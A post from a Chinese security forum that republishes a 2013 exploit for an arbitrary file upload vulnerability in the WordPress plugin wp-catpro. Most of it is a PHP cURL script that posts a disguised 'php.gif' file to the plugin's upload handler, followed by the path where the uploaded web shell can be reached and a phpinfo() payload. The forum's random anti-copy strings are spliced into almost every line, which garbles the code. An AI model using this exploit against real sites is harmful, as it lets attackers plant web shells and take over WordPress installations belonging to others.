找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2087|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability+ B+ u, p  D1 \/ t% L
#-----------------------------------------------------------------------  s2 f9 F' j9 S) e! b5 R' g
- b' b" ?: r: c% P, G% _) B
作者  => Zikou-16, m; Y2 q% r8 w3 K
邮箱 => zikou16x@gmail.com
7 q( }) `( d( B测试系统 : Windows 7 , Backtrack 5r3
$ V* \& D( x+ L下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip! b7 A* S4 ?8 J$ t
####! C7 M2 y: X: C# q

: Q. A( j3 P, i#=> Exploit 信息:" M8 P" ^; M; }) y; N3 Q
------------------+ s% O9 c/ n! Z3 C0 u6 y( A* [4 C/ s$ F
# 攻击者可以上传 file/shell.php.gif
/ i8 R3 D) b- H. r9 |; K  F* i# ("jpg", "gif", "png")  // Allowed file extensions, r5 V' w- b+ F# j
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)6 `* f9 e& p. L! g  D/ P2 [
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)" a# ~- `/ M' `- C7 h/ k* Z5 v
------------------1 o5 y! l5 b% q6 z, I

) N( x2 L3 X4 r9 k) B1 J#=> Exploit7 h0 w3 ~4 B, q. z& r5 V
-----------
0 u; Z4 C4 |. t2 {. i7 ~<?php
+ |: v" F5 M* V7 z& ?7 R5 R / \" A3 |; Q- n8 G2 N8 }1 W! i) K6 m
$uploadfile="zik.php.gif";0 o" u+ W( d4 i$ E0 i$ G/ s
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
- h$ k. N: r' ^* E, ncurl_setopt($ch, CURLOPT_POST, true);
! l6 z' S+ F) W6 ~& M: {& ^. b# zcurl_setopt($ch, CURLOPT_POSTFIELDS,! [3 ], G1 q5 k" I1 S" d
array('Filedata'=>"@$uploadfile",
* J* u! e1 @+ B* P'folder'=>'/wp-content/uploads/catpro/'));
7 Q' m& P- n. N8 M" x& t, ycurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);, w6 C5 G  g  w( S+ |
$postResult = curl_exec($ch);; n+ Z: S: @! e! A% Y! p) l; {4 @
curl_close($ch);  F& Z1 ?1 w" l" R! W+ b

% j+ Y* \# v& m( ~- cprint "$postResult";
; e5 Y2 ?! f0 c4 p - v* r% @* L. B; E5 w; _5 [
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif6 F1 s8 w/ h& e0 {/ Q
  ?>
9 @- m8 o2 C3 j& p, o<?php
1 K6 d' J' S. R7 S' h$ [phpinfo();+ L. n. e) D: p& q* t/ B9 R: y
?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表